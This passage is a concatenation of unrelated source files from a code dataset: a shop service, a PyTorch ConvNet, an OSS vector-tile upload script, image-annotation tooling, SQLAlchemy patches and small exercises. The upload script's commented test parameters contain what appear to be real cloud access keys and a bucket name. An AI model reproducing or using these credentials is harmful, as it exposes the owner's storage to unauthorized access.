aseguidas\n","sub_path":"heuristic.py","file_name":"heuristic.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"287381757","text":"# coding:utf8\n\"\"\"\n\nAuthor: ilcwd\n\"\"\"\nimport datetime\n\nfrom ..models import (\n catalog as _catalog,\n good as _good,\n contact as _contact,\n)\nfrom hoshop.core import misc\n\nfrom .dtos import HoShopDTO\n\n\ndef find_catalogs():\n return HoShopDTO(data=dict(\n catalogs=_catalog.find_catalogs(),\n ))\n\n\ndef create_catalog(name):\n catalog = _catalog.create_catalog(name)\n if catalog is not None:\n return HoShopDTO(data=catalog.dictify())\n\n return HoShopDTO(error='create catalog fail')\n\n\ndef show_goods():\n catalogs = _catalog.find_catalogs()\n goods = _good.find_goods()\n\n return HoShopDTO(data=dict(\n catalogs=catalogs,\n goods=goods,\n ))\n\n\ndef update_goods(goodid, **kw):\n if 'price' in kw:\n kw['price'] = misc.encode_price(kw.pop('price'))\n if 'expired_time' in kw:\n kw['expired_time'] = datetime.datetime.strptime(kw.pop('expired_time'), '%Y-%m-%d')\n\n if _good.update_good(goodid, **kw):\n return HoShopDTO()\n\n return HoShopDTO(error=u'更新商品失败')\n\n\ndef get_primary_contact(userid):\n c = _contact.get_default_contact(userid)\n if c:\n return HoShopDTO(data=c)\n return HoShopDTO(error=\"not found\")\n\n\ndef set_primary_contact(userid, contactid):\n c = _contact.get_contact(contactid)\n if not c:\n return HoShopDTO(error=\"contact not found\")\n\n ok = _contact.set_default_contact(userid, contactid) == 1\n if ok:\n return HoShopDTO()\n\n return HoShopDTO(error=\"set primary contact fail\")\n\n\ndef find_contacts(userid):\n cs = _contact.find_contacts(userid)\n r = {'contacts': cs, 'default': None}\n if cs:\n r['default'] = _contact.get_default_contact(userid)\n return HoShopDTO(data=r)\n\n\ndef delete_contact(userid, contactid):\n if _contact.delete_contact(userid, contactid):\n return HoShopDTO()\n\n return HoShopDTO(error='delete contact fail')\n\n\ndef create_good(name, price, catalogid, total=99999999, description='', start_time=None, expired_time=None):\n price = misc.encode_price(price)\n c = _catalog.get_catalog(catalogid);\n rows = _good.create_good(name, price, catalogid, total, description, start_time, expired_time)\n\n if rows == 1:\n return HoShopDTO(data='')\n\n return HoShopDTO(error='create good fail')","sub_path":"hoshop/services/shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"482618503","text":"import torch\nimport torch.nn as nn\n\n#----------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\nnpixels=128\nclass ConvNet(nn.Module):\n def __init__(self, num_output=2):\n super(ConvNet, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 64, kernel_size=8, stride=1, padding=4),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.AvgPool2d(kernel_size=2, stride=2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(64, 64, kernel_size=7, stride=1, padding=3),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.AvgPool2d(kernel_size=2, stride=2))\n self.layer3 = nn.Sequential(\n nn.Conv2d(64, 64, kernel_size=6, stride=1, padding=3),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.AvgPool2d(kernel_size=2, stride=2))\n self.layer4 = nn.Sequential(\n nn.Conv2d(64, 64, kernel_size=6, stride=1, padding=3),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.AvgPool2d(kernel_size=2, stride=2))\n self.fc1 = nn.Sequential(nn.Linear(64*(npixels//(2*2*2*2))*(npixels//(2*2*2*2)), 196), nn.ReLU())\n self.bn1 = nn.Sequential(nn.BatchNorm1d(196))\n self.fc2 = nn.Sequential(nn.Linear(196, 98), nn.ReLU())\n self.bn2 = nn.Sequential(nn.BatchNorm1d(98))\n self.fc3 = nn.Sequential(nn.Linear(98, 11), nn.ReLU())\n self.bn3 = nn.Sequential(nn.BatchNorm1d(11))\n self.fc4 = nn.Sequential(nn.Linear(11, num_output))\n#----------------------------------------------------------------------------------------\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = out.view(-1, 64*(npixels//(2*2*2*2))*(npixels//(2*2*2*2)))\n out = self.fc1(out)\n out = self.bn1(out)\n out = nn.functional.dropout(out,0.5)\n out = self.fc2(out)\n out = self.bn2(out)\n out = nn.functional.dropout(out,0.5)\n out = self.fc3(out)\n out = self.bn3(out)\n out = self.fc4(out)\n return out\n\n#----------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\n","sub_path":"Deep_Learning_Vertexing/scripts/MyModelClass.py","file_name":"MyModelClass.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"246381392","text":"# _*_ coding: utf-8 _*_\n# !/usr/bin/python\n__author__ = 'ma_keling'\n# Version : 1.1.0\n# Start Time : 2017-12-07\n# Update Time : 2018-7-20\n# Change Log :\n##\n\nimport os\nimport sys\nimport zipfile\nimport arcpy\nimport oss2\nimport shutil\n\n# Defines the entry point into the script\ndef main(argv=None):\n # input new part vtpk name\n newPartVtpkPath = arcpy.GetParameterAsText(0)\n\n # input update service name\n serviceName = arcpy.GetParameterAsText(1)\n\n # input oss access key id\n access_key_id = arcpy.GetParameterAsText(2)\n\n # input oss key password\n access_key_secret = arcpy.GetParameterAsText(3)\n\n # input bucket name\n bucket_name = arcpy.GetParameterAsText(4)\n\n # input endpoint\n endpoint = arcpy.GetParameterAsText(5)\n\n # testing parameters\n # newPartVtpkPath = \"/Users/maklmac/Desktop/newPart.vtpk\"\n # serviceName = 'makltest'\n # access_key_id = 'LTAI95MbCPCvRXjZ'\n # access_key_secret = '1bZNmbZzT9v8sUUqXC65VlfNeQVcRn'\n # bucket_name = 'zhoun'\n # endpoint = 'http://oss-cn-shanghai.aliyuncs.com'\n\n execute(newPartVtpkPath, serviceName, access_key_id, access_key_secret, bucket_name, endpoint)\n\n# Change vtpk extension from .vtpk to .zip\ndef retype(newPartVtpkPath,newtype):\n try:\n filename = os.path.splitext(newPartVtpkPath)[0]; # file name\n filetype = os.path.splitext(newPartVtpkPath)[1]; # file type\n olddir = newPartVtpkPath\n newdir = filename + newtype\n os.rename(olddir, newdir)\n print(\"has changed:\" + newdir)\n\n return newdir\n except:\n arcpy.AddError(\"retype failed: please provide a validates path\")\n\n#uncompress the .zip file to folder\ndef unzip(newPartZipPath):\n try:\n file_zip = zipfile.ZipFile(newPartZipPath, 'r')\n for file in file_zip.namelist():\n # print \"unziping...\"\n extractFolder = os.path.splitext(newPartZipPath)[0]\n file_zip.extract(file, extractFolder)\n file_zip.close()\n os.remove(newPartZipPath)\n print(\"unzip succeed!\")\n return extractFolder\n except:\n arcpy.AddError(\"unzip failed, please provde a validates path\")\n return False\n\ndef zip_and_retype(newPartZipPath):\n try:\n prelen = len(newPartZipPath)\n # print(prelen)\n print(\"zip root folder: \" + newPartZipPath)\n\n zipDir = newPartZipPath + \".zip\"\n fp = zipfile.ZipFile(zipDir, mode='w')\n for parent, dirnames, filenames in os.walk(newPartZipPath):\n for filename in filenames:\n pathfile = os.path.join(parent, filename)\n arcname = pathfile[prelen:].strip(os.path.sep)\n fp.write(pathfile, arcname, compress_type=zipfile.ZIP_STORED)\n fp.close()\n print(\"zipDir:\" + zipDir)\n retype(zipDir,\".vtpk\")\n return True\n except:\n arcpy.AddError(\"path or folderName not exit.\")\n\ndef delete_zip_folder(newPartZipPath):\n shutil.rmtree(newPartZipPath)\n\n# return the unzip local tile path include LODs\ndef get_local_tile_path(newPartVtpkPath):\n newPartZipPath = retype(newPartVtpkPath,\".zip\")\n extractFolder = unzip(newPartZipPath)\n # for mac path\n # tilePath = extractFolder + '/p12/tile'\n\n # for windows path\n tilePath = os.path.join(extractFolder, 'p12\\\\tile')\n print(\"local new part tile path:\", tilePath)\n return tilePath\n\n# connect OSS by access_key_id, access_key_secrest, bucket_name, endpoint\ndef connect_OSS(access_key_id,access_key_secret,bucket_name,endpoint):\n # verify parameters\n for param in (access_key_id, access_key_secret, bucket_name, endpoint):\n assert '<' not in param, '请设置参数:' + param\n\n # create Bucket object\n bucket = oss2.Bucket(oss2.Auth(access_key_id, access_key_secret), endpoint, bucket_name)\n\n print(\"connect succeed: \" + bucket_name)\n\n return bucket\n\n# upload bundles from local bundle files to OSS cache directories\ndef oss_upload_bundles(bucket,filepath,bucket_path):\n file_list = os.listdir(filepath)\n for Level in file_list:\n lodPath = os.path.join(filepath,Level)\n bundles = os.listdir(lodPath)\n bucket_lod_path = os.path.join(bucket_path,Level)\n for bundle in bundles:\n local_bundle_path = os.path.join(lodPath,bundle)\n bucket_bundle_path = os.path.join(bucket_lod_path,bundle)\n result = bucket.put_object_from_file(bucket_bundle_path, local_bundle_path)\n print(local_bundle_path)\n print (bucket_bundle_path)\n print(result)\n return True\n\n# execute method for OSS\ndef upload_bundle_In_OSS(filePath, bucketPath,access_key_id, access_key_secret, bucket_name,endpoint):\n\n bucket = connect_OSS(access_key_id, access_key_secret, bucket_name, endpoint)\n result = oss_upload_bundles(bucket, filePath, bucketPath)\n return result\n\n# get bucket cache path for specific service name\ndef get_bucket_path(serviceName):\n bucket_path= 'agssitecache/VectorCache/Hosted/' + serviceName + '/VectorTileServer/tile'\n return bucket_path\n\n\ndef execute(newPartVtpkPath, serviceName, access_key_id, access_key_secret, bucket_name,endpoint):\n\n try:\n #get local vector tile cache path\n filepath = get_local_tile_path(newPartVtpkPath)\n\n #get oss bucket path\n bucket_path = get_bucket_path(serviceName)\n\n #upload local vector tile cache to oss bucket store\n result = upload_bundle_In_OSS(filepath,bucket_path,access_key_id, access_key_secret, bucket_name,endpoint)\n\n if result:\n #zip newPathVTPKPath\n zip_and_retype(newPartVtpkPath)\n #delect zip folder\n delete_zip_folder(newPartVtpkPath)\n except:\n arcpy.AddError(\"execute failed!\")\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv[1:]))\n\n\n\n","sub_path":"python/updateVectorTileforOSS.py","file_name":"updateVectorTileforOSS.py","file_ext":"py","file_size_in_byte":5836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"578960016","text":"#输出杨辉三角第n行的第k列元素\ndef yanghui(Row, Column):\n if Column == 1 or Row == Column:\n return 1\n else:\n return yanghui(Row - 1, Column - 1) + yanghui(Row - 1, Column) \n\nRow = input(\"元素在杨辉三角的第几行:\")\nColumn = input(\"元素在杨辉三角的第几列:\")\nif int(Column) > int(Row):\n print(\"ERROR:杨辉三角中不存在此位置的元素\")\nelse:\n print(yanghui(int(Row),int(Column)))\n\n","sub_path":"python基础/yanghui.py","file_name":"yanghui.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439786183","text":"\n# coding: utf-8\n\n# In[8]:\n\nfrom databaker.framework import *\n\n\n# In[9]:\n\ntabs = loadxlstabs('beatlebattle.xlsx')\n\n\n# In[10]:\n\n\nconversionsegments = []\n\n# only 1 but conventions n all\nfor tab in tabs:\n \n obs = tab.excel_ref('B4').expand(DOWN).expand(RIGHT)\n \n beatlenames = tab.excel_ref('B3').expand(RIGHT)\n \n dimensions = [\n HDim(beatlenames, 'Name', DIRECTLY, ABOVE),\n ]\n \n conversionsegment = ConversionSegment(tab, dimensions, obs)\n conversionsegments.append(conversionsegment)\n \n \n\n\n# In[11]:\n\n\n# proceed to output\noutputfile = 'trial_beatlesoutput.csv'\nwritetechnicalCSV(outputfile, conversionsegments)\n\n","sub_path":"playing.py","file_name":"playing.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"472038090","text":"import pathlib\nimport json\nimport tqdm\nimport sys\n\n\nif __name__ == '__main__':\n from spacy.lang.en import English\n model = English()\n model.add_pipe(model.create_pipe('sentencizer'))\n\n wakati_fpath = 'data/enwiki-20181001-pages-articles.txt'\n wikiextractor_dir = pathlib.Path('data/enwiki')\n\n wakati_file = open(wakati_fpath, 'w')\n json_fpath_list = list(wikiextractor_dir.glob('*/wiki_*'))\n for json_fpath in tqdm.tqdm(json_fpath_list):\n for json_str in open(json_fpath):\n\n try:\n json_object = json.loads(json_str)\n document = json_object['text']\n document = document.replace('\\n', '')\n document = document.replace('\\r', '')\n\n document = model(document)\n for sentence in document.sents:\n try:\n print(' '.join(w.text for w in sentence),\n file=wakati_file)\n\n except Exception as e2:\n print(e2, file=sys.stderr)\n\n except Exception as e:\n print(e, file=sys.stderr)\n\n wakati_file.close()\n","sub_path":"tool/vector/vector/fetch_enwikipedia.py","file_name":"fetch_enwikipedia.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"610456362","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\n\nimport itertools\n\nfrom sqlalchemy.orm import query\nfrom sqlalchemy.orm import attributes\nfrom sqlalchemy.orm import strategies\n\nfrom nplusone.core import signals\n\n\ndef to_key(instance):\n model = type(instance)\n columns = model.__table__.primary_key.columns\n return ':'.join(\n [model.__name__] +\n [format(getattr(instance, column.key)) for column in columns]\n )\n\n\ndef parse_load(args, kwargs, context, ret):\n return [\n to_key(row) for row in ret\n if hasattr(row, '__table__')\n ]\n\n\ndef parse_lazy_load(args, kwargs, context):\n loader, state, _ = args\n return loader.parent.class_, to_key(state.object), loader.parent_property.key\n\n\ndef parse_eager_load(args, kwargs, context):\n loader = args[0]\n return loader.parent.class_, loader.key\n\n\ndef parse_attribute_get(args, kwargs, context):\n attr = args[0]\n return attr.class_, attr.key\n\n\nstrategies.LazyLoader._load_for_state = signals.signalify(\n signals.lazy_load,\n strategies.LazyLoader._load_for_state,\n parser=parse_lazy_load,\n)\n\n\nstrategies.JoinedLoader._create_eager_join = signals.signalify(\n signals.eager_load,\n strategies.JoinedLoader._create_eager_join,\n parser=parse_eager_load,\n)\n\n\nstrategies.SubqueryLoader._apply_joins = signals.signalify(\n signals.eager_load,\n strategies.SubqueryLoader._apply_joins,\n parser=parse_eager_load,\n)\n\n\nattributes.InstrumentedAttribute.__get__ = signals.signalify(\n signals.touch,\n attributes.InstrumentedAttribute.__get__,\n parser=parse_attribute_get,\n)\n\n\ndef is_single(offset, limit):\n return limit is not None and limit - (offset or 0) == 1\n\n\noriginal_query_iter = query.Query.__iter__\ndef query_iter(self):\n ret, clone = itertools.tee(original_query_iter(self))\n if not is_single(self._offset, self._limit):\n signals.load.send(\n signals.get_worker(),\n args=(self, ),\n ret=list(clone),\n parser=parse_load,\n )\n return ret\nquery.Query.__iter__ = query_iter\n","sub_path":"nplusone/ext/sqlalchemy.py","file_name":"sqlalchemy.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"22666677","text":"# Задача-1:\r\n# Дан список фруктов.\r\n# Напишите программу, выводящую фрукты в виде нумерованного списка,\r\n# выровненного по правой стороне.\r\n\r\n# Пример:\r\n# Дано: [\"яблоко\", \"банан\", \"киви\", \"арбуз\"]\r\n# Вывод:\r\n# 1. яблоко\r\n# 2. банан\r\n# 3. киви\r\n# 4. арбуз\r\n\r\n# Подсказка: воспользоваться методом .format()\r\n\r\nfruits = ['дыня', 'груша', 'апельсин', 'лайм', 'ананас', 'киви']\r\nn = 1\r\nfor i in fruits:\r\n print('{}: {:>6}'.format(n, i))\r\n n += 1\r\n\r\n# Результат\r\n# 1: дыня\r\n# 2: груша\r\n# 3: апельсин\r\n# 4: лайм\r\n# 5: ананас\r\n# 6: киви\r\n\r\n\r\n# Задача-2:\r\n# Даны два произвольные списка.\r\n# Удалите из первого списка элементы, присутствующие во втором списке.\r\n\r\nlist1 = [1, 2, 11, 560, 72, 'lol', 'for', 8, True]\r\nlist2 = [88, False, '72', True, 11, 32, 960, 1024, 'for']\r\n\r\nprint('list1:', list1)\r\nprint('list2:', list2)\r\nn = 0\r\nfor i1 in list1:\r\n for i2 in list2:\r\n if i2 == i1 and type(i1) == type(i2):\r\n list1.pop(n)\r\n n += 1\r\nprint('Result:', list1)\r\n\r\n# Результат\r\n# list1: [1, 2, 11, 560, 72, 'lol', 'for', 8, True]\r\n# list2: [88, False, '72', True, 11, 32, 960, 1024, 'for']\r\n# Result: [1, 2, 560, 72, 'lol', 8]\r\n\r\n\r\n# Задача-3:\r\n# Дан произвольный список из целых чисел.\r\n# Получите НОВЫЙ список из элементов исходного, выполнив следующие условия:\r\n# если элемент кратен двум, то разделить его на 4, если не кратен, то умножить на два.\r\n\r\nprint('20, 44, 13, 22, 265, 16, 8, 77, 80, 43')\r\na = [20, 44, 13, 22, 265, 16, 8, 77, 80, 43]\r\nb = []\r\nfor i in a:\r\n if i % 2:\r\n b.append(i * 2)\r\n else:\r\n b.append(i / 4)\r\nprint('a:', a)\r\nprint('b:', b)\r\n\r\n# Результат\r\n# 20, 44, 13, 22, 265, 16, 8, 77, 80, 43\r\n# a: [20, 44, 13, 22, 265, 16, 8, 77, 80, 43]\r\n# b: [5.0, 11.0, 26, 5.5, 530, 4.0, 2.0, 154, 20.0, 86]","sub_path":"Easy_homework 3.py","file_name":"Easy_homework 3.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"288628539","text":"\"\"\"\nContains KulpsinAnnotations-class which hopefully makes interacting with my\nannotations easier.\n\nThis is W.I.P. (work in progress) though, I advise not to use it just yet.\n\nCode: Python 3\n\"\"\"\n\nimport os\nimport json\nimport hashlib\nimport imghdr\nimport logging\nlogger = logging.getLogger(__file__)\n\nCONFIG = {\n 'min_box_side_length': 5,\n}\n\nclass KulpsinAnnotations:\n\n def __init__(self, save_path=None):\n \"\"\"\n save_path: default saving file name\"\"\"\n self._annotations = None\n self._annotation_json = save_path\n if save_path is not None:\n self.load_annotations()\n\n\n def load_annotations(self, annotation_json=None):\n \"\"\"\n Load annotations from disk at `annotation_json`.\n If `annotation_json` is None, u if hash not in annotations:\n annotations[hash] = {\n \"file_paths\": [file_name],\n \"bounding_boxes\": []\n }se `save_path` given\n when object was initialized.\n \"\"\"\n if self._annotations is not None:\n raise RuntimeError(\"Annotations loaded already\")\n # Load existing annotations:\n if annotation_json is None:\n annotation_json = self._annotation_json\n if annotation_json is None:\n raise RuntimeError(\"Save path not defined.\")\n try:\n with open(annotation_json, \"r\") as json_file:\n self._annotations = json.load(json_file)\n except FileNotFoundError as e_msg:\n logging.error(\"Annotation file not found: %s\"%annotation_json)\n self._annotations = {\"last_file_index\":0, \"images\": {}}\n\n\n def save_annotations(self, annotation_json=None, last_file_index=None, save_sets=False):\n \"\"\"Save annotations to disk at `annotation_json`.\n If `annotation_json` is None, use `save_path` given\n when object was initialized.\"\"\"\n if last_file_index is not None:\n self._annotations[\"last_file_index\"] = last_file_index\n if annotation_json is None:\n annotation_json = self._annotation_json\n if annotation_json is None:\n raise RuntimeError(\"Save path not defined.\")\n\n with open(annotation_json, 'w') as json_file:\n json.dump(self._annotations, json_file)\n if save_sets:\n test_path = os.path.join(os.path.dirname(self._annotation_json), \"test.txt\")\n trainval_path = os.path.join(os.path.dirname(self._annotation_json), \"trainval.txt\")\n logger.debug(\"Saving %s and %s\"%(test_path, trainval_path))\n with open(test_path, \"w\") as test_f, \\\n open(trainval_path, \"w\") as trainval_f:\n for image_id in self._annotations[\"images\"]:\n if self.get_image_path(image_id) is None:\n continue\n if \"image_set\" in self._annotations[\"images\"][image_id]:\n if self._annotations[\"images\"][image_id][\"image_set\"] == \"test\":\n test_f.write(image_id + \"\\n\")\n elif self._annotations[\"images\"][image_id][\"image_set\"] == \"trainval\":\n trainval_f.write(image_id + \"\\n\")\n\n def load_image_data(self, file_name=None, image_id=None):\n \"\"\"Loads existing annotations for the image.\n Adds it if it doesn't exist\n image_id: if id is known already, skip hash calculation\n returns image id and annotations\n \"\"\"\n file_type = None\n if image_id is None:\n\n # First check that it's image/photo\n file_type = imghdr.what(file_name)\n if file_type is None:\n return None\n\n # We use hash as image identifier because duplicate images\n with open(file_name, 'rb') as f:\n image_id = hashlib.sha256(f.read()).hexdigest()\n logger.debug(\"Image shaim_boxes256 hash: %s\"%hash)\n else:\n assert image_id in self._annotations[\"images\"], \"Image_id not found\"\n\n new_entry = False\n if file_name is not None:\n if image_id in self._annotations[\"images\"]:\n # Duplicate image paths are both saved (in case the other\n # is removed)\n if file_name not in self._annotations[\"images\"][image_id][\"file_paths\"]:\n self._annotations[\"images\"][image_id][\"file_paths\"].append(file_name)\n\n # Earlier version didn't have \"image_format\"-field:\n if \"image_format\" not in self._annotations[\"images\"][image_id]:\n if file_type is None:\n file_type = imghdr.what(file_name)\n assert file_type is not None, \"File type must not be None\"\n self._annotations[\"images\"][image_id][\"image_format\"] = file_type\n else:\n # Adding image data to database\n self._annotations[\"images\"][image_id] = {\n \"file_paths\": [file_name],\n \"bounding_boxes\": [],\n \"image_format\": file_type,\n }\n self.save_annotations(self._annotation_json + \".tmp\")\n new_entry = True\n return {\n \"image_id\": image_id,\n \"bounding_boxes\": self._annotations[\"images\"][image_id][\"bounding_boxes\"],\n \"new_entry\": new_entry,\n }\n\n def clear_removed_files(self):\n \"\"\"Checks \"File_paths\" and removes files that have been\n removed\"\"\"\n raise NotImplementedError\n\n def get_last_file_index(self):\n if \"last_file_index\" in self._annotations:\n return self._annotations[\"last_file_index\"]\n else:\n return 0\n\n def get_image_path(self, image_id):\n \"\"\"Getter for image path\"\"\"\n for p in self._annotations[\"images\"][image_id][\"file_paths\"]:\n if os.path.exists(p):\n return p\n\n def get_image_paths(self, image_id):\n return self._annotations[\"images\"][image_id][\"file_paths\"]\n\n def annotations(self):\n for ann in self._annotations[\"images\"]:\n yield ann\n\n def fix_and_remove_invalid_entries(self, image_id=None):\n \"\"\"Checks for:\n - Removed images\n - Negative coordinates\n - Too small bounding boxes\"\"\"\n from PIL import Image\n def fix_and_remove_single_entry(image_id, value):\n # Check for removed files:\n index = 0\n while index < len(value[\"file_paths\"]):\n p = value[\"file_paths\"][index]\n if not os.path.isfile(p):\n value[\"file_paths\"].pop(index)\n else:\n index += 1\n # TODO: Fix too large coordinates...\n first_file = self.get_image_path(image_id)\n size = None\n if first_file is not None:\n size = Image.open(self.get_image_path(image_id)).size\n\n # Check bounding boxes\n index = 0\n while index < len(value[\"bounding_boxes\"]):\n b = value[\"bounding_boxes\"][index]\n\n # TODO: Missing entity?\n #if \"entity\" not in b:\n # logger.info(\"Entity fixed...\")\n # value[\"bounding_boxes\"][index][\"entity\"] = \"person\"\n\n # Fix negative coordinates to 0\n if (b[\"pt1\"][0] < 0 or\n b[\"pt1\"][1] < 0 or\n b[\"pt2\"][0] < 0 or\n b[\"pt2\"][1] < 0):\n logger.info(\"Fixed negative coordinate (%s)!\"%str(b))\n value[\"bounding_boxes\"][index][\"pt1\"] = \\\n (max(b[\"pt1\"][0], 0), max(b[\"pt1\"][1], 0))\n value[\"bounding_boxes\"][index][\"pt2\"] = \\\n (max(b[\"pt2\"][0], 0), max(b[\"pt2\"][1], 0))\n\n # Fix too large coordinates to width-1 or height-1\n if size is not None and \\\n (b[\"pt1\"][0] >= size[0] or\n b[\"pt1\"][1] >= size[1] or\n b[\"pt2\"][0] >= size[0] or\n b[\"pt2\"][1] >= size[1]):\n logger.info(\"Fixed too large coordinate (%s)!\"%str(b))\n value[\"bounding_boxes\"][index][\"pt1\"] = \\\n (min(b[\"pt1\"][0], size[0]-1), min(b[\"pt1\"][1], size[1]-1))\n value[\"bounding_boxes\"][index][\"pt2\"] = \\\n (min(b[\"pt2\"][0], size[0]-1), min(b[\"pt2\"][1], size[1]-1))\n\n # Remove boxes too small\n if (b[\"pt2\"][0] - b[\"pt1\"][0] < CONFIG['min_box_side_length'] or\n b[\"pt2\"][1] - b[\"pt1\"][1] < CONFIG['min_box_side_length']):\n logger.info(\"Removed too small bounding box!\")\n value[\"bounding_boxes\"].pop(index)\n else:\n index += 1\n if image_id is None:\n for _image_id, value in self._annotations[\"images\"].items():\n fix_and_remove_single_entry(_image_id, value)\n\n else:\n fix_and_remove_single_entry(image_id, self._annotations[\"images\"][image_id])\n\n # Save temporary copy:\n self.save_annotations(self._annotation_json + \".tmp\")\n def remove_path(self, image_id, removable):\n \"\"\"Removes specified path from specific image and then saves annotations\n to drive\n \"\"\"\n self._annotations[\"images\"][image_id][\"file_paths\"].remove(removable)\n self.save_annotations()\n\n def add_annotation(self, image_id, points, entity):\n \"\"\"Adds annotation into image\n image_id: id from load_image_data()-method\n points: tuple format: ((x1, y1), (x2, y2))\n entity: string e.g. \"person\"\n \"\"\"\n assert type(points) is tuple, \"Use tuple for points\"\n assert len(points) == 2, \"There must be exactly 2 points\"\n assert type(points[0]) is tuple, \"Use tuple for point coordinates\"\n assert type(points[1]) is tuple, \"Use tuple for point coordinates\"\n assert image_id in self._annotations[\"images\"], \"Image_id not found\"\n\n self._annotations[\"images\"][image_id][\"bounding_boxes\"].append({\n \"entity\": entity,\n \"pt1\": points[0],\n \"pt2\": points[1],\n })\n # Save temporary copy:\n self.save_annotations(self._annotation_json + \".tmp\")\n\n def select_bounding_box(self, image_id, point, index=0):\n \"\"\"Find annotation bounding box that is around the given `point`.\n index: with overlapping boxes, this allows to choose specific one\n returns coordinates as tuple format ((x1, y1), (x2, y2))\"\"\"\n\n assert image_id in self._annotations[\"images\"], \"Image_id not found\"\n box_list = []\n for d in self._annotations[\"images\"][image_id][\"bounding_boxes\"]:\n if (d[\"pt1\"][0] <= point[0] <= d[\"pt2\"][0] and\n d[\"pt1\"][1] <= point[1] <= d[\"pt2\"][1]):\n box_list.append((d[\"pt1\"], d[\"pt2\"]))\n if len(box_list) == 0:\n return None\n return box_list[index % len(box_list)]\n\n\n def remove_annotation(self, image_id, points, entity=None):\n \"\"\"Remove specific bounding box from annotation list.\"\"\"\n assert image_id in self._annotations[\"images\"], \"Image_id not found\"\n index = 0\n while index < len(self._annotations[\"images\"][image_id][\"bounding_boxes\"]):\n d = self._annotations[\"images\"][image_id][\"bounding_boxes\"][index]\n if (d[\"pt1\"] == points[0] and\n d[\"pt2\"] == points[1] and\n (entity is None or entity == d[\"entity\"])):\n removed = self._annotations[\"images\"][image_id][\"bounding_boxes\"].pop(index)\n logger.debug(\"Removed bounding box: ({}, {}), ({},{})\".format(\n removed[\"pt1\"][0], removed[\"pt1\"][1],\n removed[\"pt2\"][0], removed[\"pt2\"][1]))\n else:\n index += 1\n\n def set_trainval(self, image_id):\n \"\"\"Assign image to trainval-set\"\"\"\n assert image_id in self._annotations[\"images\"], \"Image_id not found\"\n self._annotations[\"images\"][image_id][\"image_set\"] = \"trainval\"\n\n def set_test(self, image_id):\n \"\"\"Assign image to test-set\"\"\"\n assert image_id in self._annotations[\"images\"], \"Image_id not found\"\n self._annotations[\"images\"][image_id][\"image_set\"] = \"test\"\n\n\nif __name__ == \"__main__\":\n raise NotImplementedError\n","sub_path":"lib/datasets/kulpsin_annotation.py","file_name":"kulpsin_annotation.py","file_ext":"py","file_size_in_byte":12541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"125510128","text":"\n\nclass vector:\n def __init__(self, vec): # specifying the vector class\n self .vec = vec\n\n def __str__(self): # printing the list in form of string\n str1 =\"\"\n index =0\n for i in self.vec:\n str1 += f\" {i}a{index} +\"\n index +=1\n return str1[:-1]\n\n def __len__(self):\n return len(self.vec)\n\nv1 = vector([1, 3]) \nv2 = vector([2, 6])\nprint(v1)\nprint(v1)\nprint(len(v1)) # print len of v1 vector\nprint(len(v2)) # print len of v2 vector\n\n","sub_path":"Chap11_inheritence/16_prac7.py","file_name":"16_prac7.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"522017708","text":"# Copyright 2015-2019 Yelp Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport mock\nimport pytest\n\nimport paasta_tools.instance.kubernetes as pik\nfrom paasta_tools import utils\n\n\ndef test_instance_types_integrity():\n for it in pik.INSTANCE_TYPES:\n assert it in utils.INSTANCE_TYPES\n for it in pik.INSTANCE_TYPES_WITH_SET_STATE:\n assert it in utils.INSTANCE_TYPES\n\n\ndef instance_status_kwargs():\n return dict(\n service=\"\",\n instance=\"\",\n instance_type=\"\",\n verbose=0,\n include_smartstack=False,\n settings=mock.Mock(),\n )\n\n\n@mock.patch(\"paasta_tools.instance.kubernetes.cr_status\", autospec=True)\n@mock.patch(\"paasta_tools.instance.kubernetes.kubernetes_status\", autospec=True)\ndef test_instance_status_invalid_instance_type(mock_kubernetes_status, mock_cr_status):\n kwargs = instance_status_kwargs()\n with pytest.raises(RuntimeError) as excinfo:\n pik.instance_status(**kwargs)\n assert \"Unknown instance type\" in str(excinfo.value)\n assert len(mock_cr_status.mock_calls) == 0\n assert len(mock_kubernetes_status.mock_calls) == 0\n\n\n@mock.patch(\"paasta_tools.instance.kubernetes.cr_status\", 